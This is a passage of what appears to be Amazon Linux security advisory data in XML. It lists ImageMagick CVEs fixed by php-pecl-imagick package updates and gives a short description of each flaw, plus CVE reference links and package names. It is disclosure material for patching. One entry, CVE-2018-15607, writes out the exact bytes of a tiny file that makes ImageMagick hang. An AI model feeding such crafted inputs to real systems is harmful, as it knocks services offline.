A flaw was found in ImageMagick version 7.0.8-50 Q16, containing memory leaks of AcquireMagickMemory due to the mishandling of the NoSuchImage error in CLIListOperatorImages in MagickWand/operation.c. It was discovered that ImageMagick does not properly release acquired memory in function MogrifyImageList() when some error conditions are met, or the "compare" option is used. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-13307:
A heap-based buffer overflow was discovered in ImageMagick in the way it parses images when using the evaluate-sequence option. Applications compiled against ImageMagick libraries that accept untrustworthy images and use the evaluate-sequence option or function EvaluateImages may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13306:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to off-by-one errors. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13305:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to a misplaced strncpy and off-by-one errors. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13304:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to a misplaced assignment. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13301:
ImageMagick 7.0.8-50 Q16 has memory leaks in AcquireMagickMemory because of an AnnotateImage error.
CVE-2019-13300:
A heap-based buffer overflow was discovered in ImageMagick in the way it applies a value with arithmetic, relational, or logical operators to an image due to mishandling columns. Applications compiled against ImageMagick libraries that accept untrustworthy images and use the evaluate-sequence option or function EvaluateImages may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13297:
A heap-based buffer over-read was discovered in ImageMagick in the way it selects an individual threshold for each pixel based on the range of intensity values in its local neighborhood due to a height of zero mishandle error. Applications compiled against ImageMagick libraries that accept untrustworthy images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or leak application data.
CVE-2019-13295:
A heap-based buffer over-read was discovered in ImageMagick in the way it selects an individual threshold for each pixel based on the range of intensity values in its local neighborhood due to a width of zero mishandle error. Applications compiled against ImageMagick libraries that accept untrustworthy images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or leak application data.
CVE-2019-13135:
ImageMagick before 7.0.8-50 has a "use of uninitialized value" vulnerability in the function ReadCUTImage in coders/cut.c.
CVE-2019-13134:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadVIFFImage in coders/viff.c.
CVE-2019-13133:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadBMPImage in coders/bmp.c.
CVE-2019-12979:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the SyncImageSettings function in MagickCore/image.c. This is related to AcquireImage in magick/image.c.
CVE-2019-12978:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the ReadPANGOImage function in coders/pango.c.
CVE-2019-12976:
It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the ReadPCLImage() function. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash.
An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-12975:
It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the WriteDPXImage() function. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-12974:
A NULL pointer dereference in the function ReadPANGOImage in coders/pango.c and the function ReadVIDImage in coders/vid.c in ImageMagick 7.0.8-34 allows remote attackers to cause a denial of service via a crafted image.
CVE-2019-11598:
In ImageMagick 7.0.8-40 Q16, there is a heap-based buffer over-read in the function WritePNMImage of coders/pnm.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file. This is related to SetGrayscaleImage in MagickCore/quantize.c.
CVE-2019-11597:
In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file.
CVE-2019-11472:
ReadXWDImage in coders/xwd.c in the XWD image parsing component of ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (divide-by-zero error) by crafting an XWD image file in which the header indicates neither LSB first nor MSB first.
CVE-2019-11470:
The cineon parsing component in ImageMagick 7.0.8-26 Q16 allows attackers to cause a denial-of-service (uncontrolled resource consumption) by crafting a Cineon image with an incorrect claimed image size. This occurs because ReadCINImage in coders/cin.c lacks a check for insufficient image data in a file.
CVE-2019-10650:
In ImageMagick 7.0.8-36 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or information disclosure via a crafted image file.
CVE-2019-10131:
An off-by-one read vulnerability was discovered in ImageMagick in the formatIPTCfromBuffer function in coders/meta.c. A local attacker may use this flaw to read beyond the end of the buffer or to crash the program.
CVE-2018-9133:
ImageMagick 7.0.7-26 Q16 has excessive iteration in the DecodeLabImage and EncodeLabImage functions (coders/tiff.c), which results in a hang (tens of minutes) with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted tiff file.
CVE-2018-8804:
WriteEPTImage in coders/ept.c in ImageMagick 7.0.7-25 Q16 allows remote attackers to cause a denial of service (MagickCore/memory.c double free and application crash) or possibly have unspecified other impact via a crafted file.
CVE-2018-20467:
In coders/bmp.c in ImageMagick before 7.0.8-16, an input file can result in an infinite loop and hang, with high CPU and memory consumption. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
CVE-2018-18544:
There is a memory leak in the function WriteMSLImage of coders/msl.c in ImageMagick 7.0.8-13 Q16, and the function ProcessMSLScript of coders/msl.c in GraphicsMagick before 1.3.31.
CVE-2018-16750:
In ImageMagick 7.0.7-29 and earlier, a memory leak in the formatIPTCfromBuffer function in coders/meta.c was found.
CVE-2018-16749:
In ImageMagick 7.0.7-29 and earlier, a missing NULL check in ReadOneJNGImage in coders/png.c allows an attacker to cause a denial of service (WriteBlob assertion failure and application exit) via a crafted file.
CVE-2018-16328:
In ImageMagick before 7.0.8-8, a NULL pointer dereference exists in the CheckEventLogging function in MagickCore/log.c.
CVE-2018-15607:
In ImageMagick 7.0.8-11 Q16, a tiny input file 0x50 0x36 0x36 0x36 0x36 0x4c 0x36 0x38 0x36 0x36 0x36 0x36 0x36 0x36 0x1f 0x35 0x50 0x00 can result in a hang of several minutes during which CPU and memory resources are consumed until ultimately an attempted large memory allocation fails. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
CVE-2018-14437:
ImageMagick 7.0.8-4 has a memory leak in parse8BIM in coders/meta.c.
CVE-2018-14436:
ImageMagick 7.0.8-4 has a memory leak in ReadMIFFImage in coders/miff.c.
CVE-2018-14435:
ImageMagick 7.0.8-4 has a memory leak in DecodeImage in coders/pcd.c.
CVE-2018-14434:
ImageMagick 7.0.8-4 has a memory leak for a colormap in WriteMPCImage in coders/mpc.c.
CVE-2018-13153:
A memory leak was discovered in ImageMagick in the XMagickCommand function in animate.c file. An array of strings, named filelist, is allocated on the heap but not released in case the function ExpandFilenames returns an error code.
CVE-2018-12600:
In ImageMagick 7.0.8-3 Q16, ReadDIBImage and WriteDIBImage in coders/dib.c allow attackers to cause an out of bounds write via a crafted file.
CVE-2018-12599:
In ImageMagick 7.0.8-3 Q16, ReadBMPImage and WriteBMPImage in coders/bmp.c allow attackers to cause an out of bounds write via a crafted file.
CVE-2018-11656:
In ImageMagick 7.0.7-20 Q16 x86_64, a memory leak vulnerability was found in the function ReadDCMImage in coders/dcm.c, which allows attackers to cause a denial of service via a crafted DCM image file.
CVE-2018-10805:
ImageMagick version 7.0.7-28 contains a memory leak in ReadYCBCRImage in coders/ycbcr.c.
CVE-2018-10804:
ImageMagick version 7.0.7-28 contains a memory leak in WriteTIFFImage in coders/tiff.c.
CVE-2018-10177:
An infinite loop has been found in the way ImageMagick reads Multiple-image Network Graphics (MNG) data. An attacker could exploit this to cause a denial of service via crafted MNG file.
CVE-2017-18273:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadTXTImage in coders/txt.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted image file that is mishandled in a GetImageIndexInList call.
CVE-2017-18271:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadMIFFImage in coders/miff.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted MIFF image file.
CVE-2017-18254:
A memory leak vulnerability has been discovered in ImageMagick in the WriteGIFImage function of coders/gif.c file. An attacker could use this flaw to cause a denial of service via a crafted file.
CVE-2017-18252:
An issue was discovered in ImageMagick 7.0.7. The MogrifyImageList function in MagickWand/mogrify.c allows attackers to cause a denial of service (assertion failure and application exit in ReplaceImageInList) via a crafted file.
CVE-2017-18251:
A memory leak vulnerability has been discovered in ImageMagick in the ReadPCDImage function of coders/pcd.c file. An attacker could use this flaw to cause a denial of service via a crafted file.
CVE-2017-12806:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function format8BIM, which allows attackers to cause a denial of service.
CVE-2017-12805:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function ReadTIFFImage, which allows attackers to cause a denial of service.
CVE-2017-11166:
The ReadXWDImage function in coders\xwd.c in ImageMagick 7.0.5-6 has a memory leak vulnerability that can cause memory exhaustion via a crafted length (number of color-map entries) field in the header of an XWD file.
CVE-2017-1000476:
ImageMagick 7.0.7-12 Q16, a CPU exhaustion vulnerability was found in the function ReadDDSInfo in coders/dds.c, which allows attackers to cause a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000476" title="" id="CVE-2017-1000476" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11166" title="" id="CVE-2017-11166" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12805" title="" id="CVE-2017-12805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12806" title="" id="CVE-2017-12806" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18251" title="" id="CVE-2017-18251" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18252" title="" id="CVE-2017-18252" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18254" title="" id="CVE-2017-18254" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18271" title="" id="CVE-2017-18271" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18273" title="" id="CVE-2017-18273" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10177" title="" id="CVE-2018-10177" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10804" title="" id="CVE-2018-10804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10805" title="" id="CVE-2018-10805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11656" title="" id="CVE-2018-11656" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12599" title="" id="CVE-2018-12599" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12600" title="" id="CVE-2018-12600" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13153" title="" id="CVE-2018-13153" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14434" title="" id="CVE-2018-14434" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14435" title="" id="CVE-2018-14435" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14436" title="" id="CVE-2018-14436" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14437" title="" id="CVE-2018-14437" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15607" title="" id="CVE-2018-15607" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16328" title="" id="CVE-2018-16328" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16749" title="" id="CVE-2018-16749" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16750" title="" id="CVE-2018-16750" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18544" title="" id="CVE-2018-18544" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20467" title="" id="CVE-2018-20467" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8804" title="" id="CVE-2018-8804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9133" title="" id="CVE-2018-9133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10131" title="" id="CVE-2019-10131" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10650" title="" id="CVE-2019-10650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" title="" id="CVE-2019-11470" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" title="" id="CVE-2019-11472" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" title="" id="CVE-2019-11597" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" title="" id="CVE-2019-11598" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" title="" id="CVE-2019-12974" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" title="" id="CVE-2019-12975" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" title="" id="CVE-2019-12976" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" title="" id="CVE-2019-12978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" title="" id="CVE-2019-12979" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13133" title="" id="CVE-2019-13133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13134" title="" id="CVE-2019-13134" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" title="" id="CVE-2019-13135" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" title="" id="CVE-2019-13295" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" title="" id="CVE-2019-13297" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" title="" id="CVE-2019-13300" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" title="" id="CVE-2019-13301" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" title="" id="CVE-2019-13304" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" title="" id="CVE-2019-13305" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" title="" id="CVE-2019-13306" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" title="" id="CVE-2019-13307" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" title="" id="CVE-2019-13309" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13310" title="" id="CVE-2019-13310" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" title="" id="CVE-2019-13311" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" title="" id="CVE-2019-13454" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14980" title="" id="CVE-2019-14980" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" title="" id="CVE-2019-14981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" title="" id="CVE-2019-15139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" title="" id="CVE-2019-15140" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15141" title="" id="CVE-2019-15141" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" title="" id="CVE-2019-16708" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16709" title="" id="CVE-2019-16709" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" title="" id="CVE-2019-16710" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" title="" id="CVE-2019-16711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" title="" id="CVE-2019-16712" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" title="" id="CVE-2019-16713" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17540" title="" id="CVE-2019-17540" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17541" title="" id="CVE-2019-17541" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" title="" id="CVE-2019-19948" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" title="" id="CVE-2019-19949" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" title="" id="CVE-2019-7175" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" title="" id="CVE-2019-7397" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" title="" id="CVE-2019-7398" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9956" title="" id="CVE-2019-9956" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-pecl-imagick" version="3.4.4" release="2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pecl-imagick-3.4.4-2.16.amzn1.x86_64.rpm</filename></package><package name="php56-pecl-imagick-debuginfo" version="3.4.4" release="2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pecl-imagick-debuginfo-3.4.4-2.16.amzn1.x86_64.rpm</filename></package><package name="php56-pecl-imagick-debuginfo" version="3.4.4" release="2.16.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pecl-imagick-debuginfo-3.4.4-2.16.amzn1.i686.rpm</filename></package><package name="php56-pecl-imagick" version="3.4.4" release="2.16.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pecl-imagick-3.4.4-2.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1812</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1812: medium priority package update for php55-pecl-imagick</title><issued date="2023-08-21 12:14:00" /><updated date="2023-08-23 02:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9956:
In ImageMagick 7.0.8-35 Q16, there is a stack-based buffer overflow in the function PopHexPixel of coders/ps.c, which allows an attacker to cause a denial of service or code execution via a crafted image file.
CVE-2019-7398:
In ImageMagick before 7.0.8-25, a memory leak exists in WriteDIBImage in coders/dib.c.
CVE-2019-7397:
In ImageMagick before 7.0.8-25 and GraphicsMagick through 1.3.31, several memory leaks exist in WritePDFImage in coders/pdf.c.
CVE-2019-7175:
In ImageMagick before 7.0.8-25, some memory leaks exist in DecodeImage in coders/pcd.c.
CVE-2019-19949:
An out-of-bounds read was discovered in ImageMagick when writing PNG images. An attacker may abuse this flaw to trick a victim user into downloading a malicious image file and running it through ImageMagick, causing the application to crash.
CVE-2019-19948:
A heap-based buffer overflow flaw was discovered in ImageMagick when writing SGI images with improper columns and rows properties. An attacker may trick a victim user into downloading a malicious image file and running it through ImageMagick, possibly executing code onto the victim user's system.
CVE-2019-17541:
ImageMagick before 7.0.8-55 has a use-after-free in DestroyStringInfo in MagickCore/string.c because the error manager is mishandled in coders/jpeg.c.
CVE-2019-17540:
ImageMagick before 7.0.8-54 has a heap-based buffer overflow in ReadPSInfo in coders/ps.c.
CVE-2019-16713:
ImageMagick 7.0.8-43 has a memory leak in coders/dot.c, as demonstrated by PingImage in MagickCore/constitute.c.
CVE-2019-16712:
ImageMagick 7.0.8-43 has a memory leak in Huffman2DEncodeImage in coders/ps3.c, as demonstrated by WritePS3Image.
CVE-2019-16711:
ImageMagick 7.0.8-40 has a memory leak in Huffman2DEncodeImage in coders/ps2.c.
CVE-2019-16710:
ImageMagick 7.0.8-35 has a memory leak in coders/dot.c, as demonstrated by AcquireMagickMemory in MagickCore/memory.c.
CVE-2019-16709:
ImageMagick 7.0.8-35 has a memory leak in coders/dps.c, as demonstrated by XCreateImage.
CVE-2019-16708:
ImageMagick 7.0.8-35 has a memory leak in magick/xwindow.c, related to XCreateImage.
CVE-2019-15141:
WriteTIFFImage in coders/tiff.c in ImageMagick 7.0.8-43 Q16 allows attackers to cause a denial-of-service (application crash resulting from a heap-based buffer over-read) via a crafted TIFF image file, related to TIFFRewriteDirectory, TIFFWriteDirectory, TIFFWriteDirectorySec, and TIFFWriteDirectoryTagColormap in tif_dirwrite.c of LibTIFF. NOTE: this occurs because of an incomplete fix for CVE-2019-11597.
CVE-2019-15140:
coders/mat.c in ImageMagick 7.0.8-43 Q16 allows remote attackers to cause a denial of service (use-after-free and application crash) or possibly have unspecified other impact by crafting a Matlab image file that is mishandled in ReadImage in MagickCore/constitute.c.
CVE-2019-15139:
The XWD image (X Window System window dumping file) parsing component in ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (application crash resulting from an out-of-bounds Read) in ReadXWDImage in coders/xwd.c by crafting a corrupted XWD image file, a different vulnerability than CVE-2019-11472.
CVE-2019-14981:
In ImageMagick 7.x before 7.0.8-41 and 6.x before 6.9.10-41, there is a divide-by-zero vulnerability in the MeanShiftImage function. It allows an attacker to cause a denial of service by sending a crafted file.
CVE-2019-14980:
In ImageMagick 7.x before 7.0.8-42 and 6.x before 6.9.10-42, there is a use after free vulnerability in the UnmapBlob function that allows an attacker to cause a denial of service by sending a crafted file.
CVE-2019-13454:
ImageMagick 7.0.8-54 Q16 allows Division by Zero in RemoveDuplicateLayers in MagickCore/layer.c.
CVE-2019-13311:
A flaw was found in ImageMagick, containing memory leaks of AcquireMagickMemory due to a wand/mogrify.c error. It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the function MogrifyImageList(). An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash.
CVE-2019-13310:
A flaw was found in ImageMagick version 7.0.8-50 Q16, containing memory leaks of AcquireMagickMemory due to an error found in MagickWand/mogrify.c. It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the function MogrifyImageList(). Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-13309:
A flaw was found in ImageMagick version 7.0.8-50 Q16, containing memory leaks of AcquireMagickMemory due to the mishandling of the NoSuchImage error in CLIListOperatorImages in MagickWand/operation.c. It was discovered that ImageMagick does not properly release acquired memory in function MogrifyImageList() when some error conditions are met, or the "compare" option is used. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-13307:
A heap-based buffer overflow was discovered in ImageMagick in the way it parses images when using the evaluate-sequence option. Applications compiled against ImageMagick libraries that accept untrustworthy images and use the evaluate-sequence option or function EvaluateImages may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13306:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to off-by-one errors. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13305:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to a misplaced strncpy and off-by-one errors. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13304:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to a misplaced assignment. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13301:
ImageMagick 7.0.8-50 Q16 has memory leaks in AcquireMagickMemory because of an AnnotateImage error.
CVE-2019-13300:
A heap-based buffer overflow was discovered in ImageMagick in the way it applies a value with arithmetic, relational, or logical operators to an image due to mishandling columns. Applications compiled against ImageMagick libraries that accept untrustworthy images and use the evaluate-sequence option or function EvaluateImages may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13297:
A heap-based buffer over-read was discovered in ImageMagick in the way it selects an individual threshold for each pixel based on the range of intensity values in its local neighborhood due to a height of zero mishandle error. Applications compiled against ImageMagick libraries that accept untrustworthy images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or leak application data.
CVE-2019-13295:
A heap-based buffer over-read was discovered in ImageMagick in the way it selects an individual threshold for each pixel based on the range of intensity values in its local neighborhood due to a width of zero mishandle error. Applications compiled against ImageMagick libraries that accept untrustworthy images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or leak application data.
CVE-2019-13135:
ImageMagick before 7.0.8-50 has a "use of uninitialized value" vulnerability in the function ReadCUTImage in coders/cut.c.
CVE-2019-13134:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadVIFFImage in coders/viff.c.
CVE-2019-13133:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadBMPImage in coders/bmp.c.
CVE-2019-12979:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the SyncImageSettings function in MagickCore/image.c. This is related to AcquireImage in magick/image.c.
CVE-2019-12978:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the ReadPANGOImage function in coders/pango.c.
CVE-2019-12976:
It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the ReadPCLImage() function. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash.
An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-12975:
It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the WriteDPXImage() function. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-12974:
A NULL pointer dereference in the function ReadPANGOImage in coders/pango.c and the function ReadVIDImage in coders/vid.c in ImageMagick 7.0.8-34 allows remote attackers to cause a denial of service via a crafted image.
CVE-2019-11598:
In ImageMagick 7.0.8-40 Q16, there is a heap-based buffer over-read in the function WritePNMImage of coders/pnm.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file. This is related to SetGrayscaleImage in MagickCore/quantize.c.
CVE-2019-11597:
In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file.
CVE-2019-11472:
ReadXWDImage in coders/xwd.c in the XWD image parsing component of ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (divide-by-zero error) by crafting an XWD image file in which the header indicates neither LSB first nor MSB first.
CVE-2019-11470:
The cineon parsing component in ImageMagick 7.0.8-26 Q16 allows attackers to cause a denial-of-service (uncontrolled resource consumption) by crafting a Cineon image with an incorrect claimed image size. This occurs because ReadCINImage in coders/cin.c lacks a check for insufficient image data in a file.
CVE-2019-10650:
